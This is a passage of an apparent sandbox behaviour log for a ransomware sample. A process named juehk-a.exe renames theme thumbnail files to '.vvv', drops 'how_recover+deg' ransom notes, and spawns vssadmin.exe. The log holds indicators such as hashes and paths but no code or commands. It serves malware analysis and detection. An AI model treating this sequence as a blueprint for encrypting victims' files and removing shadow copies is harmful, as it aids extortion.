- file:
- timestamp: 86404
- mode: rename
- sequenceNumber: 1609
- filesize: 37870
- md5sum: 99ca012a9efd7146ffa08e5e4cf173e0
- sha1sum: c3b0108291f3dd2d490b77ba10d08b6047b0cce5
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PAPYRUS\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PAPYRUS\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499634
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86415
- mode: created
- sequenceNumber: 1610
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PAPYRUS\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521323
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86425
- mode: close
- sequenceNumber: 1611
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PAPYRUS\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521323
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86437
- mode: created
- sequenceNumber: 1612
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PAPYRUS\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521324
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86446
- mode: close
- sequenceNumber: 1613
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PAPYRUS\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521324
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86454
- mode: open
- sequenceNumber: 1614
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PIXEL\THMBNAIL.PNG
- filesize: 21745
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499635
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86459
- mode: close
- sequenceNumber: 1615
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PIXEL\THMBNAIL.PNG
- filesize: 22174
- md5sum: ca1ef629ee1bd8e9074dbf72d20b9496
- sha1sum: f2a291b72498d4a82a9bb42548a8b8d610080497
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499635
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86467
- mode: rename
- sequenceNumber: 1616
- filesize: 22174
- md5sum: ca1ef629ee1bd8e9074dbf72d20b9496
- sha1sum: f2a291b72498d4a82a9bb42548a8b8d610080497
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PIXEL\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PIXEL\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499635
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86483
- mode: created
- sequenceNumber: 1617
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PIXEL\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521325
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86490
- mode: close
- sequenceNumber: 1618
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PIXEL\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521325
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86496
- mode: created
- sequenceNumber: 1619
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PIXEL\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521326
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86502
- mode: open
- sequenceNumber: 1620
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PROFILE\THMBNAIL.PNG
- filesize: 16738
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499636
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86540
- mode: rename
- sequenceNumber: 1621
- filesize: 17166
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PROFILE\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PROFILE\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499636
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86676
- mode: created
- sequenceNumber: 1622
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PROFILE\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521327
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86683
- mode: created
- sequenceNumber: 1623
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\PROFILE\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521328
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86689
- mode: open
- sequenceNumber: 1624
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\QUAD\THMBNAIL.PNG
- filesize: 37112
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499637
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86922
- mode: rename
- sequenceNumber: 1625
- filesize: 37534
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\QUAD\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\QUAD\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499637
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86976
- mode: created
- sequenceNumber: 1626
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\QUAD\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521329
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86980
- mode: created
- sequenceNumber: 1627
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\QUAD\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953479375
- ntstatus: 0x0
- CreateOptions: 0x60
- process:
- timestamp: 86988
- mode: terminated
- sequenceNumber: 1628
- value: C:\Windows\System32\vssadmin.exe
- pid: 2864
- ppid: 1648
- parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- cmdline: N/A
- ads:
- fid (ads:): 281474976737319
- file:
- timestamp: 87015
- mode: open
- sequenceNumber: 1629
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RADIAL\THMBNAIL.PNG
- filesize: 19563
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499638
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87140
- mode: rename
- sequenceNumber: 1630
- filesize: 19982
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RADIAL\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RADIAL\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499638
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87210
- mode: created
- sequenceNumber: 1631
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RADIAL\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 844424930231059
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87215
- mode: created
- sequenceNumber: 1632
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RADIAL\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521330
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87222
- mode: open
- sequenceNumber: 1633
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\REFINED\THMBNAIL.PNG
- filesize: 15737
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499639
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87315
- mode: rename
- sequenceNumber: 1634
- filesize: 16158
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\REFINED\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\REFINED\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499639
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87348
- mode: created
- sequenceNumber: 1635
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\REFINED\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521331
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87359
- mode: created
- sequenceNumber: 1636
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\REFINED\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521332
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87406
- mode: open
- sequenceNumber: 1637
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RICEPAPR\THMBNAIL.PNG
- filesize: 53115
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499640
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87494
- mode: rename
- sequenceNumber: 1638
- filesize: 53534
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RICEPAPR\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RICEPAPR\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499640
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87525
- mode: created
- sequenceNumber: 1639
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RICEPAPR\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521333
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87530
- mode: created
- sequenceNumber: 1640
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RICEPAPR\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521334
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87534
- mode: open
- sequenceNumber: 1641
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RIPPLE\THMBNAIL.PNG
- filesize: 31975
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499641
- ntstatus: 0x0
- CreateOptions: 0x60
- apicall:
- timestamp: 87562
- repeat: 7000
- sequenceNumber: 1642
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- file:
- timestamp: 87671
- mode: rename
- sequenceNumber: 1643
- filesize: 32398
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RIPPLE\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RIPPLE\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499641
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87689
- mode: created
- sequenceNumber: 1644
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RIPPLE\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521335
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87699
- mode: created
- sequenceNumber: 1645
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RIPPLE\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521336
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87706
- mode: open
- sequenceNumber: 1646
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RMNSQUE\THMBNAIL.PNG
- filesize: 47962
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499642
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87717
- mode: rename
- sequenceNumber: 1647
- filesize: 48382
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RMNSQUE\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RMNSQUE\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499642
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87744
- mode: created
- sequenceNumber: 1648
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RMNSQUE\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521337
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87749
- mode: created
- sequenceNumber: 1649
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\RMNSQUE\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521338
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87755
- mode: open
- sequenceNumber: 1650
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SATIN\THMBNAIL.PNG
- filesize: 34163
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499643
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87765
- mode: rename
- sequenceNumber: 1651
- filesize: 34590
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SATIN\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SATIN\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499643
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87786
- mode: created
- sequenceNumber: 1652
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SATIN\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521339
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87793
- mode: created
- sequenceNumber: 1653
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SATIN\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521340
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87800
- mode: open
- sequenceNumber: 1654
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SKY\THMBNAIL.PNG
- filesize: 29305
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499644
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87810
- mode: rename
- sequenceNumber: 1655
- filesize: 29726
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SKY\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SKY\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499644
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87819
- mode: created
- sequenceNumber: 1656
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SKY\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521341
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87825
- mode: created
- sequenceNumber: 1657
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SKY\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521342
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87832
- mode: open
- sequenceNumber: 1658
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SLATE\THMBNAIL.PNG
- filesize: 27177
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499645
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87842
- mode: rename
- sequenceNumber: 1659
- filesize: 27598
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SLATE\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SLATE\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499645
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87851
- mode: created
- sequenceNumber: 1660
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SLATE\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521343
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87857
- mode: created
- sequenceNumber: 1661
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SLATE\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521344
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87863
- mode: open
- sequenceNumber: 1662
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SONORA\THMBNAIL.PNG
- filesize: 21812
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499646
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87873
- mode: rename
- sequenceNumber: 1663
- filesize: 22238
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SONORA\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SONORA\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499646
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87898
- mode: created
- sequenceNumber: 1664
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SONORA\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521345
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87904
- mode: created
- sequenceNumber: 1665
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SONORA\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521346
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87912
- mode: open
- sequenceNumber: 1666
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SPRING\THMBNAIL.PNG
- filesize: 19525
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499647
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87922
- mode: rename
- sequenceNumber: 1667
- filesize: 19950
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SPRING\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SPRING\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499647
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87932
- mode: created
- sequenceNumber: 1668
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SPRING\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521347
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87941
- mode: created
- sequenceNumber: 1669
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SPRING\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521348
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87946
- mode: open
- sequenceNumber: 1670
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\STRTEDGE\THMBNAIL.PNG
- filesize: 33479
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499648
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87956
- mode: rename
- sequenceNumber: 1671
- filesize: 33902
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\STRTEDGE\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\STRTEDGE\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499648
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 87965
- mode: created
- sequenceNumber: 1672
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\STRTEDGE\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521349
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87971
- mode: created
- sequenceNumber: 1673
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\STRTEDGE\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521350
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87978
- mode: open
